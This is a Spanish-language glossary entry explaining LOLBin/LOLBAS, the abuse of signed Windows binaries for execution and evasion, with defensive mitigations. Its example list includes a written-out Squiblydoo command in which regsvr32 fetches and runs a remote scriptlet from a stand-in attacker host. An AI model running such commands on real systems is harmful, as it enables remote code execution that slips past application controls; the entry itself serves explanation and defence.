Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 632

LOLBin / LOLBAS

¿Qué es LOLBin / LOLBAS?

LOLBin / LOLBASBinario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima.


LOLBin (Living-Off-the-Land Binary) y el proyecto mas amplio LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogan binarios, scripts y bibliotecas firmados por Microsoft con efectos secundarios utiles para operaciones ofensivas: ejecutar codigo arbitrario, descargar payloads remotos o saltar controles de aplicaciones. Ejemplos habituales son rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe y certutil.exe. Como cada herramienta esta firmada y es confiable, los defensores no pueden bloquear por hash y deben distinguir lineas de comando esperadas de anomalas. Los LOLBAS sostienen muchas tecnicas de ejecucion y evasion del MITRE ATT&CK. Las mitigaciones se apoyan en allow-listing de aplicaciones, logging de ScriptBlock y creacion de procesos, reglas ASR y analitica de comportamiento del EDR.

Ejemplos

  1. 01

    regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).

  2. 02

    msbuild.exe payload.xml para ejecutar C# inline sin tocar disco.

Preguntas frecuentes

¿Qué es LOLBin / LOLBAS?

Binario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.

¿Qué significa LOLBin / LOLBAS?

Binario o script nativo y firmado (LOLBin/LOLBAS) que el atacante abusa para ejecutar codigo, descargar payloads, persistir o evadir controles aparentando ser una herramienta legitima.

¿Cómo funciona LOLBin / LOLBAS?

LOLBin (Living-Off-the-Land Binary) y el proyecto mas amplio LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogan binarios, scripts y bibliotecas firmados por Microsoft con efectos secundarios utiles para operaciones ofensivas: ejecutar codigo arbitrario, descargar payloads remotos o saltar controles de aplicaciones. Ejemplos habituales son rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe y certutil.exe. Como cada herramienta esta firmada y es confiable, los defensores no pueden bloquear por hash y deben distinguir lineas de comando esperadas de anomalas. Los LOLBAS sostienen muchas tecnicas de ejecucion y evasion del MITRE ATT&CK. Las mitigaciones se apoyan en allow-listing de aplicaciones, logging de ScriptBlock y creacion de procesos, reglas ASR y analitica de comportamiento del EDR.

¿Cómo defenderse de LOLBin / LOLBAS?

Las defensas contra LOLBin / LOLBAS combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.

¿Cuáles son otros nombres para LOLBin / LOLBAS?

Nombres alternativos comunes: LOLBAS, Binario Living-off-the-Land.

Términos relacionados